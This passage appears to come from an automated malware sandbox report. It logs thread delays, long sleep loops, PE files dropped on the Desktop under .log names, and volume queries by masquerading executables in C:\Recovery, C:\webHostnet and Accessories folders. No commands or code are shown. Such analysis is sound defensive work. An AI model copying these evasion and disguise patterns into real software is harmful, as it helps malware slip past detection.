                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592656Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592546Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592436Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592299Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeThread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWindow / User API: threadDelayed 5307Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWindow / User API: threadDelayed 4657Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWindow / User API: threadDelayed 5087Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3372
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2446
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3912
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2755
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2294
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2626
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeDropped PE file which has not been started: C:\Users\user\Desktop\MXTAwxLv.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeDropped PE file which has not been started: C:\Users\user\Desktop\lhjGsiaz.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeDropped PE file which has not been started: C:\Users\user\Desktop\XLyrgJGd.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\mhsoucuo.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\CjxtNgkC.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\XGvzhUkS.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeDropped PE file which has not been started: C:\Users\user\Desktop\wVOwcuVh.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\MaBbbrQq.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeDropped PE file which has not been started: C:\Users\user\Desktop\XurZRnMb.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDropped PE file which has not been started: C:\Users\user\Desktop\MSRJxIpk.logJump to dropped file
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23757
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599890s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599778s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599671s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599562s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599453s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599344s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599234s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -599125s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -100000s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99891s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99781s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99672s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99562s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99453s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99343s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99234s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99125s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -99015s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98906s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98770s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98641s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98531s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98422s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98312s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98203s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -98090s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -97984s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -596953s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -596812s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -596615s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -596422s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860Thread sleep time: -596203s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 3084Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3272Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -599567s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -598687s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -598453s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -598281s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -598093s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 6952Thread sleep time: -3600000s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -597937s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -597312s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -597078s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -596484s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -596015s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -595884s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -595750s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -595613s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -595325s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -595156s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594944s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594839s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594718s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594548s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594422s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594257s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -594147s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593953s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593812s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593639s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593466s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593219s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -593100s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 6952Thread sleep time: -1200000s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592984s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592874s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592764s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592656s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592546s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592436s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -592299s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -100000s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99990s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99859s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99750s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99641s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99516s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -99391s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98651s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98538s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98422s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98313s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98191s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -98078s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -97969s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796Thread sleep time: -97850s >= -30000sJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 2188Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe TID: 5232Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe TID: 4428Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 4500Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 6972Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 3372 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5440Thread sleep count: 2446 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 3912 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 2755 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 2294 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2626 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -10145709240540247s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 7912Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0004A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004A69B
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005C220
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005E6A3 VirtualQuery,GetSystemInfo,0_2_0005E6A3
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599778Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599671Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599453Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599344Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 100000Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99891Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99781Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99672Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99562Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99453Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99343Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99234Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99125Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 99015Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98906Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98770Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98641Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98531Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98422Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98312Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98203Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 98090Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 97984Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596953Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596812Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596615Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596422Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 596203Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 599567Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598687Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598281Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 598093Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597937Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597312Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 596484Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 596015Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595884Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595750Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595613Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595325Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 595156Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594944Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594839Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594718Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594548Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594422Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594257Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 594147Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593953Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593812Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593639Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593466Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 593100Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592984Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592874Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592764Jump to behavior
